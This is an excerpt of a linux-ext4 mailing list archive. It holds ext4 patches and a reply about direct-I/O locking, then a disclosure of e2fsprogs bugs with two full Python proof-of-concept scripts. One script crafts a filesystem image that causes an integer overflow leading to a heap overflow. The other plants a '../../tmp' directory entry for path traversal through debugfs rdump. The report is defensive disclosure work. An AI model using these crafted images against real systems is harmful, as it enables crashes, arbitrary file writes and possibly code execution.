to it, triggering a BUG_ON(pos + len > EXT4_I(inode)->i_inline_size) in
ext4_write_inline_data() since i_inline_size was not expanded.

Fix this by ensuring that ext4_journalled_write_end() only calls
ext4_write_inline_data_end() if the EXT4_STATE_MAY_INLINE_DATA flag is
set, mirroring the behavior of ext4_write_end() and ext4_da_write_end().
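
The change in the guard can be summarized with a small truth-table model. This is only a sketch: `takes_inline_path` is a hypothetical function, and the two booleans stand in for ext4_has_inline_data() and the EXT4_STATE_MAY_INLINE_DATA state test.

```python
def takes_inline_path(has_inline_data: bool, may_inline_data: bool,
                      fixed: bool = True) -> bool:
    """Model of when the journalled write_end handler takes the inline path.

    fixed=False models the old guard (inline-data flag only);
    fixed=True models the new guard (both flags required).
    """
    if fixed:
        return has_inline_data and may_inline_data
    return has_inline_data


# The problematic state: the conversion failed, so MAY_INLINE_DATA is
# cleared while the on-disk inline-data flag is still set.
print("old guard:", takes_inline_path(True, False, fixed=False))
print("new guard:", takes_inline_path(True, False, fixed=True))
```

In this model the old guard still takes the inline path in the problematic state, while the new guard falls through to the regular path.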

Reported-by: syzbot+0c89d865531d053abb2d@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=0c89d865531d053abb2d
Fixes: 3fdcfb668fd7 ("ext4: add journalled write support for inline data")
Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
---
 fs/ext4/inode.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index c2c2d6ac7f3d..4fce9ec176f8 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -1560,7 +1560,8 @@ static int ext4_journalled_write_end(const struct kiocb *iocb,

 	BUG_ON(!ext4_handle_valid(handle));

-	if (ext4_has_inline_data(inode))
+	if (ext4_has_inline_data(inode) &&
+	    ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
 		return ext4_write_inline_data_end(inode, pos, len, copied,
 						  folio);

-- 
2.47.3

* [PATCH] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08  6:11 UTC (permalink / raw)
  To: linux-ext4
  Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
	Sashiko

The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().

If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum.  Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.

Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.
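
The arithmetic behind the " & 7" check can be sketched as follows. This is a simplified model under the assumptions stated in the message (checksum length is the per-group count divided by 8, rounded down); the function names are hypothetical and do not exist in the kernel.

```python
def csum_covered_bits(entries_per_group: int) -> int:
    """Bits covered when the checksum length is entries_per_group >> 3 bytes."""
    return (entries_per_group >> 3) * 8


def unprotected_bits(entries_per_group: int) -> int:
    """Trailing bitmap bits that fall outside the checksummed bytes."""
    return entries_per_group & 7


def geometry_is_valid(entries_per_group: int, blocksize: int) -> bool:
    """Range check plus the added alignment check, as described above."""
    return entries_per_group <= blocksize * 8 and (entries_per_group & 7) == 0


# A count that passes the range check for a 4096-byte block but is not
# a multiple of 8.
n = 32765
print(csum_covered_bits(n), unprotected_bits(n), geometry_is_valid(n, 4096))
```

With a 4096-byte block, 32765 entries per group pass the existing range check but leave 5 bits outside the checksum, so the added alignment test rejects them.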

Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
 fs/ext4/super.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3daf4cdcf07e 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
 		sbi->s_cluster_bits = 0;
 	}
 	sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
-	if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+	if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_clusters_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
 			 sbi->s_clusters_per_group);
 		return -EINVAL;
 	}
@@ -5304,7 +5305,8 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
 		return -EINVAL;
 	}
 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
-	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+	    sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_inodes_per_group & 7) {
 		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
 			 sbi->s_inodes_per_group);
 		return -EINVAL;
-- 
2.43.7


* Re: [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Baokun Li @ 2026-06-08  2:25 UTC (permalink / raw)
  To: Peng Wang
  Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, yi.zhang,
	linux-ext4, inux-kernel
In-Reply-To: <20260607124935.6168-1-peng_wang@linux.alibaba.com>

On 2026/6/7 20:49, Peng Wang wrote:
> ext4_overwrite_io() decides whether a direct I/O write is an overwrite
> (all target blocks already allocated) so the write can proceed under a
> shared inode lock.  It calls ext4_map_blocks() once and returns false
> if the mapped length is shorter than the requested length.
>
> ext4_map_blocks() maps at most one extent per call.  When a write
> straddles two extents (e.g. a written extent and an adjacent unwritten
> extent created by fallocate), the single call returns only the first
> extent's length.  ext4_overwrite_io() then mis-classifies the write as
> non-overwrite and forces the caller to cycle i_rwsem from shared to
> exclusive.

For the aligned case, the overwrite check can now be skipped entirely.

For non-aligned cases, you can optimistically hold the read lock and then
use the IOMAP_DIO_OVERWRITE_ONLY flag to upgrade to a write lock if needed.
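
To make the false negative in the quoted description concrete, here is a toy Python model. It is a sketch only: extents are reduced to (first_block, nblocks) pairs, `map_blocks` is a hypothetical stand-in that maps at most one extent per call, and the looping variant is just one possible way to avoid the misclassification, not necessarily what the RFC patch or the suggestion above does.

```python
def map_blocks(extents, start, length):
    """Return how many blocks from `start` lie in a single allocated extent.

    `extents` is a list of (first_block, nblocks) tuples for allocated
    ranges. Returns 0 if `start` falls in a hole.
    """
    for first, nblocks in extents:
        if first <= start < first + nblocks:
            return min(length, first + nblocks - start)
    return 0


def is_overwrite_single_call(extents, start, length):
    """One lookup only: a short mapping is treated as 'not an overwrite'."""
    return map_blocks(extents, start, length) == length


def is_overwrite_looping(extents, start, length):
    """Keep mapping until the whole range is covered or a hole is found."""
    end = start + length
    while start < end:
        mapped = map_blocks(extents, start, end - start)
        if mapped == 0:
            return False
        start += mapped
    return True


# Two adjacent allocated extents; the write covers blocks 4..11.
adjacent = [(0, 8), (8, 8)]
print(is_overwrite_single_call(adjacent, 4, 8))
print(is_overwrite_looping(adjacent, 4, 8))
```

In this model the single-call check reports a non-overwrite for a write that straddles the two adjacent extents, while the looping check recognizes that every target block is already allocated.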



* security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Feng Xue @ 2026-06-07 13:34 UTC (permalink / raw)
  To: tytso@mit.edu, tytso@alum.mit.edu; +Cc: linux-ext4@vger.kernel.org


[-- Attachment #1.1: Type: text/plain, Size: 129 bytes --]

Hi there,

I'd like to report two potential security bugs for your review.
A detailed report and PoCs are attached.

Best,
Feng

[-- Attachment #1.2: Type: text/html, Size: 1255 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: craft_inode_overflow.py --]
[-- Type: text/x-python-script; name="craft_inode_overflow.py", Size: 13481 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers an integer overflow in
the inode_blocks_per_group calculation in lib/ext2fs/openfs.c:359-362.

Bug:
    fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                                   EXT2_INODE_SIZE(fs->super) +
                                   EXT2_BLOCK_SIZE(fs->super) - 1) /
                                  EXT2_BLOCK_SIZE(fs->super));

The multiplication s_inodes_per_group * s_inode_size is done in 32-bit
unsigned arithmetic. If the product exceeds 2^32, it silently wraps,
producing a small inode_blocks_per_group. This causes all inode table
boundary checks to use wrong bounds, leading to OOB access.

Strategy:
  - blocksize = 65536  (s_log_block_size = 6)
  - inode_size = 16384  (power of 2, >= 128, <= blocksize)
  - s_inodes_per_group = 0x40001 = 262145
  - product = 262145 * 16384 = 0x100004000 -> truncated to 0x4000 = 16384
  - inode_blocks_per_group = ceil(16384 / 65536) = 1  (should be 65537!)
  - Only 1 block (64K) of inode table is considered valid per group, but
    the fs claims 262145 inodes per group. Accessing any inode beyond the
    first 4 (65536/16384=4) triggers OOB reads from the inode table.
  - The inode bitmap check requires inodes_per_group/8 <= blocksize.
    262145/8 = 32768 <= 65536. Passes.

Crash chain (inode scan path):
  1. openfs.c:359: inode_blocks_per_group = 1 (should be 65537)
  2. inode.c:293: blocks_left = 1 (only 1 block of inode table is read)
  3. After 4 inodes, blocks_left = 0, but inodes_left = 262141
  4. get_next_blocks returns num_blocks=0, bytes_left=0
  5. inode.c:727-728: ptr += inode_size, bytes_left -= inode_size => -16384
  6. inode.c:659: memcpy(temp_buffer, ptr, bytes_left) with bytes_left = -16384
     => cast to size_t = huge value => heap buffer overflow

Trigger: debugfs crafted.img -R "lsdel"
         (any command that triggers ext2fs_open_inode_scan / get_next_inode)
"""

import struct
import sys
import os
import subprocess

# Superblock field offsets (from ext2_fs.h, all relative to superblock start)
OFF_INODES_COUNT       = 0x00   # __u32
OFF_BLOCKS_COUNT       = 0x04   # __u32
OFF_R_BLOCKS_COUNT     = 0x08   # __u32
OFF_FREE_BLOCKS_COUNT  = 0x0C   # __u32
OFF_FREE_INODES_COUNT  = 0x10   # __u32
OFF_FIRST_DATA_BLOCK   = 0x14   # __u32
OFF_LOG_BLOCK_SIZE     = 0x18   # __u32
OFF_LOG_CLUSTER_SIZE   = 0x1C   # __u32
OFF_BLOCKS_PER_GROUP   = 0x20   # __u32
OFF_CLUSTERS_PER_GROUP = 0x24   # __u32
OFF_INODES_PER_GROUP   = 0x28   # __u32
OFF_MAGIC              = 0x38   # __u16
OFF_STATE              = 0x3A   # __u16
OFF_REV_LEVEL          = 0x4C   # __u32
OFF_FIRST_INO          = 0x54   # __u32
OFF_INODE_SIZE         = 0x58   # __u16
OFF_FEATURE_COMPAT     = 0x5C   # __u32
OFF_FEATURE_INCOMPAT   = 0x60   # __u32
OFF_FEATURE_RO_COMPAT  = 0x64   # __u32
OFF_DESC_SIZE          = 0xFE   # __u16
OFF_LOG_GROUPS_PER_FLEX = 0x174 # __u8
OFF_CHECKSUM_TYPE      = 0x175  # __u8
OFF_BLOCKS_COUNT_HI    = 0x150  # __u32
OFF_RESERVED_GDT_BLOCKS = 0xCE # __u16

# Feature flags
EXT2_FEATURE_INCOMPAT_FILETYPE = 0x0002
EXT3_FEATURE_INCOMPAT_EXTENTS  = 0x0040
EXT4_FEATURE_INCOMPAT_64BIT    = 0x0080
EXT4_FEATURE_INCOMPAT_FLEX_BG  = 0x0200
EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER = 0x0001
EXT2_FEATURE_RO_COMPAT_LARGE_FILE   = 0x0002
EXT4_FEATURE_RO_COMPAT_HUGE_FILE    = 0x0008
EXT4_FEATURE_RO_COMPAT_GDT_CSUM     = 0x0010
EXT4_FEATURE_RO_COMPAT_DIR_NLINK    = 0x0020
EXT4_FEATURE_RO_COMPAT_EXTRA_ISIZE  = 0x0040
EXT4_FEATURE_RO_COMPAT_METADATA_CSUM = 0x0400
EXT2_FEATURE_COMPAT_EXT_ATTR   = 0x0008
EXT2_FEATURE_COMPAT_RESIZE_INODE = 0x0010
EXT2_FEATURE_COMPAT_DIR_INDEX  = 0x0020

EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024


def read_u32(data, off):
    return struct.unpack_from('<I', data, off)[0]

def read_u16(data, off):
    return struct.unpack_from('<H', data, off)[0]

def write_u32(data, off, val):
    struct.pack_into('<I', data, off, val & 0xFFFFFFFF)

def write_u16(data, off, val):
    struct.pack_into('<H', data, off, val & 0xFFFF)

def write_u8(data, off, val):
    struct.pack_into('<B', data, off, val & 0xFF)


def create_crafted_image(path, size_mb=128):
    """Create a crafted ext4 image from scratch (no mke2fs dependency).

    We write the superblock, group descriptor, and minimal structures
    directly to bypass any tool-level validation.
    """
    blocksize = 65536       # 64K blocks
    log_block_size = 6      # 1024 << 6 = 65536
    inode_size = 16384      # 16K inodes
    inodes_per_group = 0x40001  # 262145

    # 1 group with 1024 blocks. Total = 1024 * 64K = 64MB
    blocks_per_group = 1024
    first_data_block = 0
    blocks_count = blocks_per_group  # 1 group
    groups_cnt = 1
    inodes_count = groups_cnt * inodes_per_group  # 262145

    # Verify the overflow
    product = (inodes_per_group * inode_size) & 0xFFFFFFFF
    inode_blocks_per_group = (product + blocksize - 1) // blocksize
    correct_ibpg = (inodes_per_group * inode_size + blocksize - 1) // blocksize

    print(f"\n=== Overflow Analysis ===")
    print(f"  blocksize         = {blocksize}")
    print(f"  inode_size        = {inode_size}")
    print(f"  inodes_per_group  = {inodes_per_group} (0x{inodes_per_group:08X})")
    print(f"  true product      = {inodes_per_group * inode_size} (0x{inodes_per_group * inode_size:X})")
    print(f"  truncated product = {product} (0x{product:08X})")
    print(f"  inode_blocks_per_group (buggy)   = {inode_blocks_per_group}")
    print(f"  inode_blocks_per_group (correct) = {correct_ibpg}")
    print(f"  groups_cnt = {groups_cnt}")
    print(f"  inodes_count = {inodes_count}")

    # Verify openfs.c checks will pass:
    # 1. s_log_block_size <= 6
    assert log_block_size <= 6

    # 2. inode_size >= 128, <= blocksize, power of 2
    assert inode_size >= 128
    assert inode_size <= blocksize
    assert (inode_size & (inode_size - 1)) == 0

    # 3. blocks_per_group >= 8
    assert blocks_per_group >= 8

    # 4. blocks_per_group <= EXT2_MAX_BLOCKS_PER_GROUP = 65528
    assert blocks_per_group <= 65528

    # 5. inode_blocks_per_group <= EXT2_MAX_INODES_PER_GROUP
    max_ipg = 65536 - (blocksize // inode_size)  # 65536 - 4 = 65532
    assert inode_blocks_per_group <= max_ipg

    # 6. EXT2_DESC_PER_BLOCK = blocksize / 32 = 2048. Non-zero.
    assert (blocksize // 32) != 0

    # 7. first_data_block < blocks_count
    assert first_data_block < blocks_count

    # 8. groups_cnt < 2^32
    assert groups_cnt < (1 << 32)

    # 9. groups_cnt * inodes_per_group == inodes_count
    assert groups_cnt * inodes_per_group == inodes_count

    # 10. Bitmap check: inodes_per_group / 8 <= blocksize
    # The check uses C integer division, so 262145 / 8 = 32768 (the
    # fractional 0.125 is dropped) and the comparison passes. A bitmap that
    # covered every inode would need (262145 + 7) / 8 = 32769 bytes.
    inode_bitmap_bytes = inodes_per_group // 8
    assert inode_bitmap_bytes <= blocksize, \
        f"inode bitmap {inode_bitmap_bytes} > blocksize {blocksize}"

    print("  All validation checks pass!")

    # Create the image
    image_size = blocks_count * blocksize
    print(f"\n  Image size = {image_size} bytes ({image_size // (1024*1024)} MB)")
    data = bytearray(image_size)

    # === Write superblock at offset 1024 ===
    sb_off = SUPERBLOCK_OFFSET

    write_u32(data, sb_off + OFF_INODES_COUNT, inodes_count)
    write_u32(data, sb_off + OFF_BLOCKS_COUNT, blocks_count)
    write_u32(data, sb_off + OFF_R_BLOCKS_COUNT, 0)
    write_u32(data, sb_off + OFF_FREE_BLOCKS_COUNT, max(0, blocks_count - 6))
    write_u32(data, sb_off + OFF_FREE_INODES_COUNT, inodes_count - 11)
    write_u32(data, sb_off + OFF_FIRST_DATA_BLOCK, first_data_block)
    write_u32(data, sb_off + OFF_LOG_BLOCK_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_LOG_CLUSTER_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_BLOCKS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_CLUSTERS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_INODES_PER_GROUP, inodes_per_group)
    write_u16(data, sb_off + OFF_MAGIC, EXT2_SUPER_MAGIC)
    write_u16(data, sb_off + OFF_STATE, 1)  # EXT2_VALID_FS
    write_u32(data, sb_off + OFF_REV_LEVEL, 1)  # EXT2_DYNAMIC_REV
    write_u32(data, sb_off + OFF_FIRST_INO, 11)
    write_u16(data, sb_off + OFF_INODE_SIZE, inode_size)
    write_u32(data, sb_off + OFF_BLOCKS_COUNT_HI, 0)  # __u32 field

    # Feature flags: minimal. No 64bit, no metadata_csum, no journal.
    feat_compat = 0  # nothing
    feat_incompat = EXT2_FEATURE_INCOMPAT_FILETYPE
    feat_ro_compat = (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER |
                      EXT2_FEATURE_RO_COMPAT_LARGE_FILE)

    write_u32(data, sb_off + OFF_FEATURE_COMPAT, feat_compat)
    write_u32(data, sb_off + OFF_FEATURE_INCOMPAT, feat_incompat)
    write_u32(data, sb_off + OFF_FEATURE_RO_COMPAT, feat_ro_compat)

    write_u16(data, sb_off + OFF_DESC_SIZE, 0)
    write_u8(data, sb_off + OFF_LOG_GROUPS_PER_FLEX, 0)
    write_u8(data, sb_off + OFF_CHECKSUM_TYPE, 0)
    write_u16(data, sb_off + OFF_RESERVED_GDT_BLOCKS, 0)

    # === Write Group Descriptor at block 1 ===
    # Block 0 contains the superblock (at offset 1024 within the block).
    # Block 1 is the group descriptor table.
    gdt_off = 1 * blocksize  # 65536
    # bg_block_bitmap: block 2
    # bg_inode_bitmap: block 3
    # bg_inode_table:  block 4 (only 1 block due to overflow!)
    struct.pack_into('<I', data, gdt_off + 0x00, 2)   # bg_block_bitmap
    struct.pack_into('<I', data, gdt_off + 0x04, 3)   # bg_inode_bitmap
    struct.pack_into('<I', data, gdt_off + 0x08, 4)   # bg_inode_table
    struct.pack_into('<H', data, gdt_off + 0x0C, max(0, blocks_count - 6))  # bg_free_blocks_count
    struct.pack_into('<H', data, gdt_off + 0x0E, min(inodes_count - 11, 65535))  # bg_free_inodes_count
    struct.pack_into('<H', data, gdt_off + 0x10, 2)   # bg_used_dirs_count
    struct.pack_into('<H', data, gdt_off + 0x12, 0)   # bg_flags

    # === Write a minimal root inode (inode 2) in the inode table ===
    # Inode table starts at block 4, offset = 4 * 65536 = 262144.
    # Inode 2 (root) is at index 1 (0-based), so offset = 262144 + 1 * 16384.
    # Inode 1 is special "bad blocks" inode.
    inode_table_off = 4 * blocksize
    root_inode_off = inode_table_off + 1 * inode_size  # inode 2

    # Minimal inode: directory, mode=0755
    i_mode = 0o40755  # S_IFDIR | 0755
    struct.pack_into('<H', data, root_inode_off + 0x00, i_mode)   # i_mode
    struct.pack_into('<H', data, root_inode_off + 0x02, 0)        # i_uid
    struct.pack_into('<I', data, root_inode_off + 0x04, blocksize) # i_size
    struct.pack_into('<H', data, root_inode_off + 0x1A, 2)        # i_links_count

    # Write the image
    with open(path, 'wb') as f:
        f.write(data)

    print(f"\nImage written to: {path}")
    return data


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output_image>")
        sys.exit(1)

    output_path = sys.argv[1]

    print("Creating crafted ext4 image with inode_blocks_per_group overflow...")
    data = create_crafted_image(output_path)

    # Print superblock verification
    print(f"\nSuperblock verification:")
    sb = data[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET+256]
    print(f"  s_inodes_count     = {struct.unpack_from('<I', sb, 0x00)[0]}")
    print(f"  s_blocks_count     = {struct.unpack_from('<I', sb, 0x04)[0]}")
    print(f"  s_first_data_block = {struct.unpack_from('<I', sb, 0x14)[0]}")
    print(f"  s_log_block_size   = {struct.unpack_from('<I', sb, 0x18)[0]}")
    print(f"  s_blocks_per_group = {struct.unpack_from('<I', sb, 0x20)[0]}")
    print(f"  s_inodes_per_group = {struct.unpack_from('<I', sb, 0x28)[0]} (0x{struct.unpack_from('<I', sb, 0x28)[0]:08X})")
    print(f"  s_magic            = 0x{struct.unpack_from('<H', sb, 0x38)[0]:04X}")
    print(f"  s_rev_level        = {struct.unpack_from('<I', sb, 0x4C)[0]}")
    print(f"  s_inode_size       = {struct.unpack_from('<H', sb, 0x58)[0]}")
    print(f"  s_feature_compat   = 0x{struct.unpack_from('<I', sb, 0x5C)[0]:08X}")
    print(f"  s_feature_incompat = 0x{struct.unpack_from('<I', sb, 0x60)[0]:08X}")
    print(f"  s_feature_ro_compat= 0x{struct.unpack_from('<I', sb, 0x64)[0]:08X}")

    # Show the overflow math
    ipg = struct.unpack_from('<I', sb, 0x28)[0]
    isz = struct.unpack_from('<H', sb, 0x58)[0]
    bsz = 1024 << struct.unpack_from('<I', sb, 0x18)[0]
    product_full = ipg * isz
    product_trunc = product_full & 0xFFFFFFFF
    ibpg_buggy = (product_trunc + bsz - 1) // bsz
    ibpg_correct = (product_full + bsz - 1) // bsz
    print(f"\n  Overflow demonstration:")
    print(f"    {ipg} * {isz} = {product_full} (0x{product_full:X})")
    print(f"    truncated to 32 bits = {product_trunc} (0x{product_trunc:X})")
    print(f"    inode_blocks_per_group (buggy)   = {ibpg_buggy}")
    print(f"    inode_blocks_per_group (correct) = {ibpg_correct}")
    print(f"    Ratio: buggy is {ibpg_correct / ibpg_buggy:.0f}x too small!")
    print(f"\n    With buggy value, only {ibpg_buggy * bsz // isz} inodes are")
    print(f"    addressable in the inode table, but the FS claims {ipg}.")
    print(f"    Any inode > {ibpg_buggy * bsz // isz} will cause an OOB read.")


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #3: craft_path_traversal.py --]
[-- Type: text/x-python-script; name="craft_path_traversal.py", Size: 5972 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers path traversal in
debugfs rdump.

Bug: debugfs/dump.c:265
  sprintf(fullname, "%s/%s", dumproot, name);

The 'name' comes from directory entries on the crafted filesystem.
If name contains "../" components, files are written outside the
intended dump directory.

Additionally, symlink targets are read from the filesystem (line 215/226)
and created on the host (line 242), allowing arbitrary symlink creation.

Usage:
  python3 craft_path_traversal.py output.img
  debugfs output.img -R "rdump / /tmp/safe_dir"
  # Result: file created at /tmp/traversal_proof (outside safe_dir)
"""

import struct
import sys
import subprocess


def create_base_image(path, size_mb=4):
    with open(path, 'wb') as f:
        f.write(b'\x00' * size_mb * 1024 * 1024)

    subprocess.run([
        'mke2fs', '-t', 'ext4', '-F',
        '-b', '1024',
        '-N', '128',
        '-O', '^has_journal,^extents',
        path
    ], check=True, capture_output=True)


def patch_traversal(img_path):
    """Add a directory entry with ../ in the name pointing to a regular file."""
    with open(img_path, 'r+b') as f:
        # Read superblock
        f.seek(1024)
        sb = f.read(1024)
        s_log_block_size = struct.unpack_from('<I', sb, 24)[0]
        s_inode_size = struct.unpack_from('<H', sb, 88)[0]
        s_inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
        block_size = 1024 << s_log_block_size

        # Read group descriptor
        gd_offset = block_size * 2 if block_size == 1024 else block_size
        f.seek(gd_offset)
        gd = f.read(64)
        inode_table_block = struct.unpack_from('<I', gd, 8)[0]
        inode_table_offset = inode_table_block * block_size

        # Use inode 12 for a regular file with content
        target_ino = 12
        target_offset = inode_table_offset + (target_ino - 1) * s_inode_size
        f.seek(target_offset)
        inode_data = bytearray(f.read(s_inode_size))

        # Set as regular file (mode 0100644)
        struct.pack_into('<H', inode_data, 0, 0o100644)
        struct.pack_into('<H', inode_data, 2, 0)  # uid

        # Content lives in a separate data block referenced by i_block[0]
        content = b'TRAVERSAL_PROOF: file written outside dump directory\n'
        struct.pack_into('<I', inode_data, 4, len(content))  # i_size
        struct.pack_into('<H', inode_data, 26, 1)  # i_links_count

        # Allocate a data block for the file content
        # Use block 100 (should be free in a small fs)
        data_block = 100
        struct.pack_into('<I', inode_data, 40, data_block)  # i_block[0]
        struct.pack_into('<I', inode_data, 28, 2)  # i_blocks (in 512-byte sectors)

        f.seek(target_offset)
        f.write(inode_data)

        # Write content to the data block
        f.seek(data_block * block_size)
        f.write(content + b'\x00' * (block_size - len(content)))

        # Now add a directory entry in root with name "../../tmp/traversal_proof"
        # This will cause rdump to write outside the dump directory
        root_offset = inode_table_offset + (2 - 1) * s_inode_size
        f.seek(root_offset)
        root_inode = bytearray(f.read(s_inode_size))
        root_block = struct.unpack_from('<I', root_inode, 40)[0]

        dir_offset = root_block * block_size
        f.seek(dir_offset)
        dir_data = bytearray(f.read(block_size))

        # Find last entry and add our traversal entry
        pos = 0
        last_entry_pos = 0
        while pos < block_size:
            inode_num = struct.unpack_from('<I', dir_data, pos)[0]
            rec_len = struct.unpack_from('<H', dir_data, pos + 4)[0]
            if rec_len == 0:
                break
            if inode_num != 0:
                last_entry_pos = pos
            next_pos = pos + rec_len
            if next_pos >= block_size:
                break
            pos = next_pos

        last_rec_len = struct.unpack_from('<H', dir_data, last_entry_pos + 4)[0]
        last_name_len = dir_data[last_entry_pos + 6]
        actual_last_size = ((8 + last_name_len + 3) // 4) * 4
        remaining = last_rec_len - actual_last_size

        # Path traversal name: from /tmp/out3, "../.." climbs to / and the
        # remainder re-enters /tmp, landing outside the dump directory
        entry_name = b'../../tmp/traversal_proof'
        new_entry_size = ((8 + len(entry_name) + 3) // 4) * 4

        if remaining >= new_entry_size:
            struct.pack_into('<H', dir_data, last_entry_pos + 4, actual_last_size)
            new_pos = last_entry_pos + actual_last_size
            struct.pack_into('<I', dir_data, new_pos, target_ino)
            struct.pack_into('<H', dir_data, new_pos + 4, remaining)
            dir_data[new_pos + 6] = len(entry_name)
            dir_data[new_pos + 7] = 1  # file_type = regular
            dir_data[new_pos + 8:new_pos + 8 + len(entry_name)] = entry_name

            f.seek(dir_offset)
            f.write(dir_data)
            print(f"Added traversal dir entry: '{entry_name.decode()}' -> inode {target_ino}")
        else:
            print(f"Not enough space (need {new_entry_size}, have {remaining})")
            sys.exit(1)

        # Mark inode 12 as used in bitmap
        inode_bitmap_block = struct.unpack_from('<I', gd, 4)[0]
        f.seek(inode_bitmap_block * block_size)
        bitmap = bytearray(f.read(block_size))
        byte_idx = (target_ino - 1) // 8
        bit_idx = (target_ino - 1) % 8
        bitmap[byte_idx] |= (1 << bit_idx)
        f.seek(inode_bitmap_block * block_size)
        f.write(bitmap)

        print(f"Patched image with path traversal entry")
        print(f"Trigger: debugfs {img_path} -R 'rdump / /tmp/out3'")
        print(f"Expected: file created at /tmp/traversal_proof (outside /tmp/out3)")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output.img>")
        sys.exit(1)

    output = sys.argv[1]
    create_base_image(output)
    patch_traversal(output)


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #4: REPORT-inode-blocks-overflow.md --]
[-- Type: text/markdown; name="REPORT-inode-blocks-overflow.md", Size: 7015 bytes --]

# e2fsprogs: Integer overflow in inode_blocks_per_group causes heap buffer overflow

## Summary

A 32-bit integer overflow in `ext2fs_open2()` when computing
`inode_blocks_per_group` from untrusted superblock fields allows a
crafted filesystem image to cause a heap buffer overflow in any
libext2fs consumer that scans inodes (debugfs, dumpe2fs, fuse2fs, etc.).

## Affected Component

- File: `lib/ext2fs/openfs.c`, lines 359-362
- Downstream crash: `lib/ext2fs/inode.c`, line 659
- Versions: all current versions including 1.47.4
- Affected tools: `debugfs`, `dumpe2fs`, `fuse2fs`, `e2image`, and any
  program using `ext2fs_open()` + inode scanning. Note: `e2fsck` has an
  additional `check_super_value` guard that catches this, so e2fsck is
  NOT affected.

## Severity

**High** — Heap buffer overflow (memcpy with negative/huge size) leading
to crash. Potential code execution with a carefully crafted image.

## Root Cause

In `ext2fs_open2()`, the inode table size per group is computed as:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

`EXT2_INODES_PER_GROUP` is `s_inodes_per_group` (`__u32`) and
`EXT2_INODE_SIZE` is `s_inode_size` (`__u16`, promoted to `int`). Under C's
usual arithmetic conversions, the multiplication is performed in
`unsigned int` (32-bit), so any product of 2^32 or more silently wraps
modulo 2^32.

The validation at line 397 compares the already-truncated value:
```c
fs->inode_blocks_per_group > EXT2_MAX_INODES_PER_GROUP(fs->super)
```
This passes because the truncated value is small.

## Crash Chain

With `s_inodes_per_group = 262145` and `s_inode_size = 16384`:

1. **openfs.c:359**: `262145 * 16384 = 0x100004000` truncates to
   `0x4000 = 16384`. Result: `inode_blocks_per_group = 1` (should be
   65537).

2. **inode.c:293**: Inode scan sets `blocks_left = 1`, reads only 1
   block (4 inodes worth of data).

3. **inode.c:727**: After exhausting the buffer, `bytes_left -= inode_size`
   produces `bytes_left = -16384`.

4. **inode.c:659**: `memcpy(temp_buffer, ptr, bytes_left)` — `bytes_left`
